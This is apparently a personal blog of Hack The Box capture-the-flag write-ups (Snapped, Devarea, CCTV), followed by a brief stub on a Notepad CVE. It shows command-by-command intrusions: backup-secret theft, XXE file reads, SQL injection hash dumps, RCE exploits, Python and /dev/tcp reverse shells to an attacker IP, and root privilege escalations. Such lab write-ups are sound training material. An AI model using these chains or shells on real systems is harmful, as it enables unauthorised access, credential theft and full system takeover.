Portfolio | Surajit Sen

HTB – Snapped

2026-04-28T00:00:00+00:00

Initial Enumeration

After getting the target ip address, the first step was to perform an Nmap scan to identify open ports and services:

nmap -sC -sV -A -p- -O --min-rate=1000 10.129.42.237

Scan Results:

Starting Nmap 7.95 at 2026-04-28 02:15 EDT
Nmap scan report for 10.129.42.237
Host is up (0.29s latency).
Not shown: 65533 closed tcp ports (reset)

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15
| ssh-hostkey: 
|   256 4b:c1:eb:48:87:4a:08:54:89:70:93:b7:c7:a9:ea:79 (ECDSA)
|_  256 46:da:a5:65:91:c9:08:99:b2:96:1d:46:0b:fc:df:63 (ED25519)

80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://snapped.htb/

Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops

Web Enumeration & Subdomain Discovery

Navigating to http://10.129.42.237 revealed a redirect to http://snapped.htb. The domain was added to /etc/hosts:

echo "10.129.42.237 snapped.htb" | tee -a /etc/hosts

Initial browsing of snapped.htb didn’t revealed anything juicy, so subdomain fuzzing was performed:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/n0kovo_subdomains.txt \
      -u http://snapped.htb -H "HOST: FUZZ.snapped.htb" -mc 200

Discovery:

admin                   [Status: 200, Size: 1407, Words: 164, Lines: 50]

The subdomain admin.snapped.htb was added to /etc/hosts and accessed, revealing an Nginx UI dashboard.

Exploiting CVE-2026-27944 (Nginx UI)

Research into Nginx UI vulnerabilities revealed:

Critical Vulnerabilities (2026):

CVE-2026-33032 (MCPwn Authentication Bypass - CVSS 9.8)
- The /mcp_message endpoint fails to enforce authentication
- Allows unauthenticated attackers to manage Nginx and execute commands
CVE-2026-27944 (Unauthenticated Backup Download - CVSS 9.8)
- Versions before 2.3.3 allow unauthenticated backup access
- AES-256 encryption key and IV disclosed in X-Backup-Security header
- Enables decryption of credentials, SSL keys, and configs
CVE-2026-33026 (Backup Tampering & Injection)
- Fixed in 2.3.4, allows malicious config injection

Exploiting the Backup Vulnerability

Accessing http://admin.snapped.htb/api/backup downloaded a ZIP file:

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ file backup-20260428-022136.zip 
backup-20260428-022136.zip: Zip archive data

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ unzip backup-20260428-022136.zip 
Archive:  backup-20260428-022136.zip
  inflating: hash_info.txt           
  inflating: nginx-ui.zip            
  inflating: nginx.zip

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ cat hash_info.txt 
�)+��ƺ�c��MfL�U98�5�5Ԕ��G�c�]F�Ujr'���|�!
%&��(���x       �9t5�Q�]_>��(@��B��k���c��7�2_O��#��\�����>�c{�Q�����ڄ�>l�����ƝT7/�}��X��uC��(
�A(�K�/��
         ��
           ց��0QS�軭��  

its encrypted The X-Backup-Security header contained the encryption key and IV:

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb]
└─$ curl -v http://admin.snapped.htb/api/backup -o backup.zip 2>&1 | grep -i "X-Backup-Security"
< X-Backup-Security: 4kaig8RUr+4NSvfJ6Of3bj6W7nP9VwYP9IjZGSiGCto=:wevqrDQJpKHXzrJSr+taQg==

Decrypting the Backup

Using a public exploit for CVE-2026-27944:

https://github.com/Skynoxk/CVE-2026-27944

┌──(kali㉿blackXploit)-[~/Downloads/snappedhtb/CVE-2026-27944-POC]
└─$ python exploit_enhanced.py --target http://admin.snapped.htb --decrypt --show-secrets
        
======================================================================
CVE-2026-27944 - Nginx UI Unauthenticated Backup Download + Dashboard Access
======================================================================

[*] Downloading backup from http://admin.snapped.htb/api/backup
[+] Backup downloaded successfully (18306 bytes)
[+] Saved to: backup.bin

[*] X-Backup-Security header: FHAHISTlSj7auC9HPLsz6xby+mBvo3bvbl7VMyNOWZE=:ZMpW3hraTFvZc/EF6Rr+jw==
[+] Parsed AES-256 key: FHAHISTlSj7auC9HPLsz6xby+mBvo3bvbl7VMyNOWZE=
[+] Parsed AES IV    : ZMpW3hraTFvZc/EF6Rr+jw==

[+] Key length: 32 bytes (AES-256 ✓)
[+] IV length : 16 bytes (AES block size ✓)

[*] Extracting encrypted backup to backup_extracted
[*] Main archive contains: ['hash_info.txt', 'nginx-ui.zip', 'nginx.zip']
[*] Decrypting hash_info.txt...
    → Saved to backup_extracted/hash_info.txt.decrypted (199 bytes)
[*] Decrypting nginx-ui.zip...
    → Saved to backup_extracted/nginx-ui_decrypted.zip (7688 bytes)
    → Extracted 2 files to backup_extracted/nginx-ui
[*] Decrypting nginx.zip...
    → Saved to backup_extracted/nginx_decrypted.zip (9936 bytes)
    → Extracted 22 files to backup_extracted/nginx

[*] Hash info:
nginx-ui_hash: 4ad8655192ed5ee220cb820d46db34c1049c37ef4a7ddc5482010620976e72bb
nginx_hash: 2f0263bd95d62226c216fff4bc222711b713e9b4a993207dc8695137c536af09
timestamp: 20260428-024653
version: 2.3.2


[*] Extracting secrets from backup_extracted/nginx-ui/app.ini
[+] Secrets extracted:
    JWT Secret    : 6c4af436-035a-4942-9ca6-172b36696ce9
    Node Secret   : c64d7ca1-19cb-4ebe-96d4-49037e7df78e
    Crypto Secret : 5c942292647d73f597f47c0be2237bf7347cdb70a0e8e8558e448318862357d6
    Email         : admin@test.htb

[*] Verifying Node Secret bypass...
[+] Node Secret verified! Admin API access confirmed
[+] Total users in system: 2

┌──(kali㉿blackXploit)-[~/…/snappedhtb/CVE-2026-27944-POC/backup_extracted/nginx-ui]
└─$ ls                        
app.ini  database.db
                                                                                             
┌──(kali㉿blackXploit)-[~/…/snappedhtb/CVE-2026-27944-POC/backup_extracted/nginx-ui]
└─$ pwd                                                                                  
/home/kali/Downloads/snappedhtb/CVE-2026-27944-POC/backup_extracted/nginx-ui

SSH Access

After cracking the password for user jonathan:

┌──(kali㉿blackXploit)-[~/Downloads]
└─$ ssh jonathan@snapped.htb
The authenticity of host 'snapped.htb (10.129.42.237)' can't be established.
ED25519 key fingerprint is: SHA256:n0XlQQqHGczclhalpCeoOZDYQGr7rl3WlJytHLWPkr8
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'snapped.htb' (ED25519) to the list of known hosts.
jonathan@snapped.htb's password: 

Successful Login:

Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.17.0-19-generic x86_64)

jonathan@snapped:~$ ls
Desktop  Documents  Downloads  linpeas.sh  Music  Pictures  Public  snap  Templates  user.txt  Videos

Privilege Escalation via CVE-2026-3888

Understanding the Vulnerability

CVE-2026-3888 is a local privilege escalation vulnerability in snap-confine and systemd-tmpfiles. Here’s how it works:

Step 1: The Regular Cleanup (The Trigger)

Linux systems use systemd-tmpfiles to delete old files in /tmp to save space
By default, it clears out files every few weeks
The Flaw: When this service deletes /tmp/.snap, it briefly leaves a “hole” where that folder used to be

Step 2: The Race Condition (The Timing)

This is a TOCTOU (Time-of-Check to Time-of-Use) bug
An attacker cannot delete the folder themselves (no permission), so they wait for the system to do it
The Attack: The attacker runs a script that constantly watches that folder. The millisecond the system deletes it, the attacker’s script “races” to recreate a new version of that folder before the real snap service notices it’s gone

Step 3: The Bait-and-Switch

Because the attacker created the new /tmp/.snap folder, they own it
They place a “trap” inside: a symbolic link pointing to a sensitive part of the system (like the root filesystem)

Step 4: The Elevation (The Payoff)

Any snap app starting (or triggered by the attacker) causes snap-confine to run
snap-confine sees the folder is missing or needs resetting, so it prepares the sandbox
Because snap-confine runs with Root privileges, it follows the attacker’s “shortcut” without realizing it’s a trap
It ends up mounting the attacker’s malicious files into a high-privilege area
The Result: The attacker, who started as a normal user, now has a “backdoor” into the system’s core and becomes Root

System Information

jonathan@snapped:~$ snap --version
snap    2.63.1+24.04
snapd   2.63.1+24.04
series  16
ubuntu  24.04
kernel  6.17.0-19-generic

Executing the Exploit

The exploit was run against the Firefox snap:

how this exploit works ?

systemd-tmpfiles deletes the stale .snap mimic directory under /tmp (30-day age-out)
Attacker recreates it with controlled content — all files owned by the attacker
Exploit single-steps snap-confine via AF_UNIX socket backpressure to reliably win the race during the mimic bind-mount sequence
Attacker-owned libraries are mounted into the sandbox as root
ld-linux-x86-64.so.2 is replaced with shellcode that calls setreuid(0,0) + execve
Executing SUID snap-confine triggers the shellcode with root privileges
SUID bash is dropped to /var/snap/firefox/common/ to escape the sandbox

jonathan@snapped:~/snap$ ./exploit ./librootshell.so -d

Exploit Output:

================================================================
    CVE-2026-3888 — snap-confine / systemd-tmpfiles SUID LPE
================================================================
[*] Payload: /home/jonathan/snap/./librootshell.so (9056 bytes)

[Phase 1] Entering Firefox sandbox...
[+] Inner shell PID: 65385

[Phase 2] Waiting for .snap deletion...
[*] --skip-wait: triggering cleanup...

[Phase 3] Race condition execution...
logger.go:93: DEBUG: need to create writable mimic needed to create path "/usr/lib/x86_64-linux-gnu/webkit2gtk-4.0"
logger.go:93: DEBUG: create-writable-mimic "/usr/lib/x86_64-linux-gnu"
logger.go:93: DEBUG: mount name:"/usr/lib/x86_64-linux-gnu" dir:"/tmp/.snap/usr/lib/x86_64-linux-gnu"

[!]   TRIGGER — swapping directories...
[+]   SWAP DONE — race won!
[*]   ld-linux in namespace: jonathan:jonathan 755
[+]   Poisoned namespace PID: 65882

[Phase 5] Injecting payload into poisoned namespace...
[+]   ld-linux owned by uid 1000 (attacker). Race confirmed.
[*]   Planting busybox...
[*]   Writing escape script → /tmp/sh
[*]   Overwriting ld-linux-x86-64.so.2...
[+]   Payload injected.

[Phase 6] Triggering root via SUID snap-confine...
[*]   snap-confine → snap-confine (SUID trigger)
[*]   Exit status: 0

[Phase 7] Verifying...
[+] SUID root bash: /var/snap/firefox/common/bash (mode 4755)
[*] Cleaning up background processes...

================================================================
  ROOT SHELL: /var/snap/firefox/common/bash -p
================================================================

Root Access Achieved

bash-5.1# id
uid=1000(jonathan) gid=1000(jonathan) euid=0(root) groups=1000(jonathan)

bash-5.1# ls
Desktop  Documents  Downloads  linpeas.sh  Music  Pictures  Public  snap  Templates  user.txt  Videos

bash-5.1# cd /root
bash-5.1# ls
nginxui  root.txt  snap

bash-5.1# cat root.txt
redact

References

Thanks for reading ! happy hacking

HTB – Devarea

2026-04-09T00:00:00+00:00

after getting the ip i first ran

nmap -sC -sV -p- --min-rate=10000 10.129.244.208

got

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.5
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.15.9
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.5 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Sep 22  2025 pub
22/tcp   open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.15 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 83:13:6b:a1:9b:28:fd:bd:5d:2b:ee:03:be:9c:8d:82 (ECDSA)
|_  256 0a:86:fa:65:d1:20:b4:3a:57:13:d1:1a:c2:de:52:78 (ED25519)
80/tcp   open  http    Apache httpd 2.4.58
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: DevArea - Connect with Top Development Talent
8080/tcp open  http    Jetty 9.4.27.v20200227
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.27.v20200227)
8500/tcp open  http    Golang net/http server
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 09 Apr 2026 07:49:11 GMT
|     Content-Length: 64
|     This is a proxy server. Does not respond to non-proxy requests.
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 09 Apr 2026 07:48:52 GMT
|     Content-Length: 64
|     This is a proxy server. Does not respond to non-proxy requests.
|   HTTPOptions: 
|     HTTP/1.0 500 Internal Server Error
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Thu, 09 Apr 2026 07:48:53 GMT
|     Content-Length: 64
|_    This is a proxy server. Does not respond to non-proxy requests.
8888/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Hoverfly Dashboard

so juicy right ? lets check whats inside this ftp server :

└─# ftp 10.129.244.208   
Connected to 10.129.244.208.
220 (vsFTPd 3.0.5)
Name (10.129.244.208:kali): Anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43974|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Sep 22  2025 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||41712|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp       6445030 Sep 22  2025 employee-service.jar
226 Directory send OK.
ftp> get 

Downloaded File:

employee-service.jar (a java archive file ) lets see

Decompiling with jd-gui

jd-gui

open the file inside it

juicy file: `ServerStarter.java`

package htb.devarea;

import org.apache.cxf.jaxws.JaxWsServerFactoryBean;

public class ServerStarter {
    public static void main(String[] args) {
        JaxWsServerFactoryBean factory = new JaxWsServerFactoryBean();
        factory.setServiceClass(EmployeeService.class);
        factory.setServiceBean(new EmployeeServiceImpl());
        factory.setAddress("http://0.0.0.0:8080/employeeservice");
        factory.create();
        System.out.println("Employee Service running at http://localhost:8080/employeeservice");
        System.out.println("WSDL available at http://localhost:8080/employeeservice?wsdl");
    }
}

Critical Observations

Finding	Implication
Apache CXF JAX-WS implementation	SOAP web service framework
Running on Jetty 9.4.27	Released in 2020 - old and vulnerable
Endpoint: `/employeeservice`	Exposed SOAP service
WSDL available	Service definition publicly accessible

Vulnerability Research

Googling “Apache CXF Jetty 9.4.27 vulnerability” leads us to:

CVE-2022-46364 - Apache CXF XXE via XOP Include in MTOM SOAP requests

Vulnerability Details:

Affected Versions: Apache CXF ≤ 3.5.2 / ≤ 3.4.9
Impact: Arbitrary file read via XXE/SSRF
Vector: MTOM+XOP attachment processing

How it works: MTOM (Message Transmission Optimization Mechanism) uses tags to reference binary attachments. The vulnerable CXF version doesn’t validate the URI scheme, allowing file:// protocol to read local files.

XXE Exploitation (CVE-2022-46364)

Exploit Script: `CVE-2022-46364.py`

I found a public PoC and modified it for our target. (https://github.com/kasem545/CVE-2022-46364-Poc)

# python3 CVE-2022-46364.py

[CONFIG]
  Target:   http://devarea.htb:8080/employeeservice
  SSRF URL: file:///etc/passwd
  Domain:   devarea.htb
  Method:   MTOM

[*] Sending exploit payload...
[+] Server responded: HTTP 200

[RAW RESPONSE SNIPPET]
Report received from cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjpt

[BASE64 EXTRACTED]
cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xv...

[EXFILTRATED CONTENT]
======================================================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nol
---

Success! the user running the Jetty service.discovered a user: dev_ryan.

Finding Hoverfly Configuration

as we have previously discovered the Hoverfly instance on port 8080 i quickly googled any vulnerability exits or not and found CVE-2025-54123 - Hoverfly Command Injection (RCE) The vulnerability exists in the middleware management API endpoint /api/v2/hoverfly/middleware where insufficient input validation and sanitization allows attackers to inject and execute arbitrary system commands. This flaw enables unauthenticated remote code execution (RCE) on any system running vulnerable Hoverfly versions 1.11.3 and prior. more : https://www.sentinelone.com/vulnerability-database/cve-2025-54123/ https://github.com/advisories/GHSA-r4h8-hfp2-ggmf but before exploiting we need to find the admin creds. The systemd unit file for HoverFly reveals its startup command — complete with hardcoded credentials passed as CLI arguments.

python3 CVE-2022-46364.py \
  -t http://devarea.htb:8080/employeeservice \
  -s file:///etc/systemd/system/hoverfly.service \
  -d devarea.htb

got

[Unit]
Description=HoverFly service
After=network.target

[Service]
User=dev_ryan
Group=dev_ryan
WorkingDirectory=/opt/HoverFly
ExecStart=/opt/HoverFly/hoverfly -add -username admin -password redact -listen-on-host 0.0.0.0

Restart=on-failure
RestartSec=5

Credentials Found: admin:redact for Hoverfly Dashboard!

Hoverfly Dashboard & RCE

Accessing the Dashboard

Navigate to http://devarea.htb:8888 and log in with:

Username: admin
Password: redact

CVE-2025-54123 - Hoverfly RCE as discovered earlier

Exploit Script:

python3 CVE-2025-54123.py \
  -u admin \
  -p redact \
  -c "whoami" \
  -t http://devarea.htb:8888

[+] Login on http://devarea.htb:8888/api/token-auth
[+] Token: eyJhbGciOiJIUzUxMiIs...
[+] Sending RCE: whoami

=== OUTPUT ===
dev_ryan

** Command execution confirmed!** now upgrade to a reverse shell.

Spawning a Reverse Shell

nc -lvnp 4444

python3 CVE-2025-54123.py -u admin -p redact -c "whoami" -t http://devarea.htb:8888 -r 10.10.15.9 4444

wohoo got the shell

connect to [10.10.15.9] from (UNKNOWN) [10.129.244.208] 58104
bash: cannot set terminal process group (1461): Inappropriate ioctl for device
bash: no job control in this shell
dev_ryan@devarea:/opt/HoverFly$

User Flag

With our shell established, let’s grab that user flag.

dev_ryan@devarea:/$ 
find . -name "user.txt"
./home/dev_ryan/user.txt
cat /home/dev_ryan/user.txt

Privilege Escalation Analysis

sudo -l

Matching Defaults entries for dev_ryan on devarea:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User dev_ryan may run the following commands on devarea:
    (root) NOPASSWD: /opt/syswatch/syswatch.sh

Privesc Vector: woa i can run /opt/syswatch/syswatch.sh as root without a password! in the same dir where i found the user flag i also discovered a script called syswatch.zip

Key Finding: The script calls /usr/bin/bash in several functions. But here’s the kicker:

ls -la /usr/bin/bash
# Output: -rwxrwxrwx 1 root root 1396520 ... /usr/bin/bash

CRITICAL MISCONFIGURATION: /usr/bin/bash is world-writable! Anyone can modify the system’s bash binary.

Root Exploitation

Setting Up a Clean Shell

Our current reverse shell is bash-based, which would be killed when we terminate all bash processes. We need a clean, non-bash shell.

On Kali (Second Listener):

nc -lvnp 5332

From existing shell, send a Python PTY shell:

python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("10.10.15.9",5332));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Shell Received on port 5332:

$ id
uid=1001(dev_ryan) gid=1001(dev_ryan) groups=1001(dev_ryan)

Clean shell acquired! This is /bin/sh, not bash.

Creating the Malicious Payload

# Backup the real bash binary
cp /usr/bin/bash /tmp/bash.bak

# Create our payload script
echo '#!/tmp/bash.bak' > /tmp/bash_payload
echo 'chmod u+s /usr/bin/python3' >> /tmp/bash_payload

# Make it executable
chmod +x /tmp/bash_payload

# Verify contents
cat /tmp/bash_payload

Payload Contents:

#!/tmp/bash.bak
chmod u+s /usr/bin/python3

What this does: When executed as root, it sets the SUID bit on Python3. SUID binaries run with the owner’s permissions (root), regardless of who executes them.

Killing Bash Processes

We need to free /usr/bin/bash so we can overwrite it.

# Find all bash processes
ps aux | grep bash | grep -v grep

Output:

dev_ryan    5267  0.0  0.1   8544  5508 ?        S    07:07   0:00 bash -i
dev_ryan    5546  0.0  0.0   7340  3668 ?        S    07:15   0:00 /bin/bash /tmp/hoverfly/hoverfly_3324889479
dev_ryan    5547  0.0  0.0   7340  3616 ?        S    07:15   0:00 bash -c bash -i >& /dev/tcp/10.10.15.9/4444 0>&1
dev_ryan    5548  0.0  0.1   8544  5508 ?        S    07:15   0:00 bash -i

# Kill all bash processes
kill -9 5267 5546 5547 5548

# Verify no processes are using /usr/bin/bash
lsof /usr/bin/bash
# (No output = file is free)

Note: Our original shell on port 4444 died here - that’s why we created the second shell!

Deploying the Payload

# Overwrite the system bash binary
cp /tmp/bash_payload /usr/bin/bash

# Verify the replacement
ls -la /usr/bin/bash
cat /usr/bin/bash

Output:

-rwxrwxrwx 1 root root 43 Apr  9 07:21 /usr/bin/bash
#!/tmp/bash.bak
chmod u+s /usr/bin/python3

Triggering the Exploit

sudo /opt/syswatch/syswatch.sh web-status

The syswatch.sh script runs as root and calls /usr/bin/bash, executing our payload with root privileges!

Checking for SUID Python3

ls -la /usr/bin/python3

Before: lrwxrwxrwx 1 root root 10 /usr/bin/python3 -> python3.12
After: The actual python3.12 binary now has the SUID bit set.

Spawning Root Shell

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

# id
uid=0(root) gid=1001(dev_ryan) groups=1001(dev_ryan)

WE ARE ROOT!

Flag

# cat /root/root.txt

Note : there are more alternatives ways to get root btw — Thanks for reading! Happy hacking! 🚀

HTB – CCTV

2026-03-26T00:00:00+00:00

hlw guys, i am back today target: cctv.htb let’s exploit it together!

Recon

so after getting the ip i first ran

rustscan -a 10.129.12.97

found 2 ports open: 22 and 80 after heading over to port 80 there is a page mostly named SecureVison then i ran gobuster as well as fuzzing subdomains, nothing found interesting !

next i checked the staff login button

i found zoneminder login it’s a “A full-featured, open source, state-of-the-art video surveillance software system. Monitor your home, office, or wherever you want.” i checked the default creds for login and saw the default creds are admin/admin

version running: v1.37.63 i quickly googled the exact version in order to search for vulnerabilities related to it and wowa, found CVE-2024-51482

https://github.com/BridgerAlderson/CVE-2024-51482 there is a blind sql injection vulnerability http://target/zm/index.php?view=request&request=event&action=removetag&tid=[INJECTION_POINT]

python3 CVE-2024-51482.py -i cctv.htb -u admin -p admin --discover
[*] CVE-2024-51482 - ZoneMinder Blind SQL Injection Exploit
[*] Target: cctv.htb

[*] Logging in as 'admin' on cctv.htb...
[+] Login successful
[*] Measuring baseline response time...
[*] Baseline median: 0.284s
[*] Testing vulnerability with 2s sleep...
[*] Response time: 2.36s
[+] Target is vulnerable!
[*] Enumerating databases...
[+] Found database: information_schema                
[+] Found database: performance_schema                                 
[+] Found database: zm

let’s try to dump the username and password table

python3 CVE-2024-51482.py -i cctv.htb -u admin -p admin --dump zm Users "Username,Password"
[*] CVE-2024-51482 - ZoneMinder Blind SQL Injection Exploit
[*] Target: cctv.htb

[*] Logging in as 'admin' on cctv.htb...
[+] Login successful
[*] Measuring baseline response time...
[*] Baseline median: 0.259s
[*] Testing vulnerability with 2s sleep...
[*] Response time: 2.27s
[+] Target is vulnerable!
[*] Dumping data from 'zm.Users'...
[*] Row 1: {'Username': 'admin                                   &            #                8              #  #                                       ', 'Password': '$2y$10$cmytVWFRnt1XfqsItsJRVe/ApxWxcIFQcURnm5N.rhlULwM0krtbm                      &                                             '}
[*] Row 2: {'Username': 'mark                                                                     /                                                      ', 'Password': '$2y$10$prZGnazejKcuTv5bKNexYOgLyQaok0hq07LW7AJ

it’s a bcrypt hash, let’s try to crack it using hashcat

echo "markhashhere" > hash.txt
hashcat -m 3200[for bcrypt hash] hash.txt [your preferred wordlist here] recommended rockyou.txt

after getting the password try to connect using ssh

ssh mark@cctv.htb               
The authenticity of host 'cctv.htb (10.129.12.97)' can't be established.
ED25519 key fingerprint is SHA256:KrrHjS+nu1wJEfv1/NxT1fI+ODJaSRdJtFg201G+tO0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cctv.htb' (ED25519) to the list of known hosts.
mark@cctv.htb's password: 
Permission denied, please try again.
mark@cctv.htb's password: 
Welcome to Ubuntu 24.04.4 LTS (GNU/Linux 6.8.0-101-generic x86_64)
mark@cctv:~$
mark@cctv:~$ ls -la 
total 40
drwxr-x--- 6 mark mark 4096 Mar 26 14:55 .
drwxr-xr-x 4 root root 4096 Mar  2 09:49 ..
lrwxrwxrwx 1 root root    9 Feb 13 10:01 .bash_history -> /dev/null
-rw-r--r-- 1 mark mark  220 Mar 31  2024 .bash_logout
-rw-r--r-- 1 mark mark 3771 Mar 31  2024 .bashrc
drwx------ 2 mark mark 4096 Mar  2 09:49 .cache
drwx------ 3 mark mark 4096 Mar  2 09:49 .gnupg
drwxrwxr-x 3 mark mark 4096 Mar 26 14:55 .local
-rw-r--r-- 1 mark mark  807 Mar 31  2024 .profile
drwx------ 2 mark mark 4096 Mar  2 09:49 .ssh
-rw-rw-r-- 1 mark mark  165 Sep 14  2025 .wget-hsts
mark@cctv:~$ id
uid=1000(mark) gid=1000(mark) groups=1000(mark),24(cdrom),30(dip),46(plugdev)
mark@cctv:~$ sudo -l
[sudo] password for mark: 
Sorry, user mark may not run sudo on cctv.
mark@cctv:~$ sudo -l
[sudo] password for mark: 
Sorry, user mark may not run sudo on cctv.
mark@cctv:~$

since it’s related to some cctv-related stuff, let’s check the services running inside it for that i used ss -tlnp

ss -tlnp
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process 
LISTEN 0      151        127.0.0.1:3306       0.0.0.0:*            
LISTEN 0      4096      127.0.0.54:53         0.0.0.0:*            
LISTEN 0      4096         0.0.0.0:22         0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:7999       0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:1935       0.0.0.0:*            
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:8554       0.0.0.0:*            
LISTEN 0      70         127.0.0.1:33060      0.0.0.0:*            
LISTEN 0      128        127.0.0.1:8765       0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:8888       0.0.0.0:*            
LISTEN 0      4096       127.0.0.1:9081       0.0.0.0:*            
LISTEN 0      4096            [::]:22            [::]:*            
LISTEN 0      511                *:80               *:*

then i quickly googled some ports like 7999,1935,8765 and found port 8765 is used for the motioneye service

motioneye “MotionEye is a web interface for the motion daemon, which is a video surveillance program that includes motion detection capabilities. It allows users to manage and visualize multiple camera feeds from a single platform”

the config file is located here Main Configuration File: The primary file for motionEye server settings is /etc/motioneye/motioneye.conf. This file defines paths for logs, media, and other global options

source: github official docs

then to interact with this web interface i needed to forward the port

ssh -L 8765:127.0.0.1:8765 mark@cctv.htb

got it there is a login page! i tried to login with the username as “admin” and the password associated with it found in config file and boom! then after seeing the version i found another CVE CVE-2025-60787 https://github.com/gunzf0x/CVE-2025-60787

“A critical Remote Code Execution (RCE) vulnerability exists in motionEye 0.43.1b4 and earlier versions, identified primarily as CVE-2025-60787 (also related to GHSA-j945-qm58-4gjx). This vulnerability allows an authenticated attacker with administrative access to execute arbitrary OS commands via the add_camera functionality in the web interface. “

since motioneye runs as root inside the machine, if we get a shell we can entirely access root as well no need for priv escalation

┌──(root㉿kali)-[/home/kali/Downloads/cctv/CVE-2025-60787]
└─# python3 CVE-2025-60787.py revshell \
--url 'http://127.0.0.1:8765' \
--user 'admin' \
--password 'redact' \
-i 10.10.14.84 \
--port 4444

make sure to start nc -lvnp 4444

[*] Attempting to connect to 'http://127.0.0.1:8765' with credentials 'admin:989c5a8ee87a0e9521ec81a79187d162109282f0'
[*] Valid credentials provided
[*] Obtaining cameras available
[*] Found 1 camera(s)
    1) Name: 'CAM 01' ; ID: 1; root_directory: '/var/lib/motioneye/Camera1'
[*] Using camera by default (first one found) for the exploit
[*] Payload successfully injected. Check your shell...
~Happy Hacking

got the shell

root@cctv:/# find / -name "root.txt"   
find / -name "root.txt" 
/root/root.txt
root@cctv:/# cd /root
cd /root
root@cctv:~# cat root.txt
cat root.txt

root@cctv:~# find / -name "user.txt" 
find / -name "user.txt" 
/home/sa_mark/user.txt
root@cctv:~# cd /home/sa_mark 
cd /home/sa_mark
root@cctv:/home/sa_mark# ls
ls
SecureVision Staff Announcement.pdf
user.txt
root@cctv:/home/sa_mark# cat user.txt
cat user.txt

root@cctv:/home/sa_mark#

happy hacking! btw if you really like my writeups please leave a comment so i can make it better. thanks btw!

CVE-2026-20841

2026-02-13T00:00:00+00:00

Guys , another stupid CVE was disclosed in Windows Notepad that allows command execution via crafted Markdown links. scary and stupid right ?

lets analyze it together

References

https://foss-daily.org/posts/microsoft-notepad-2026/
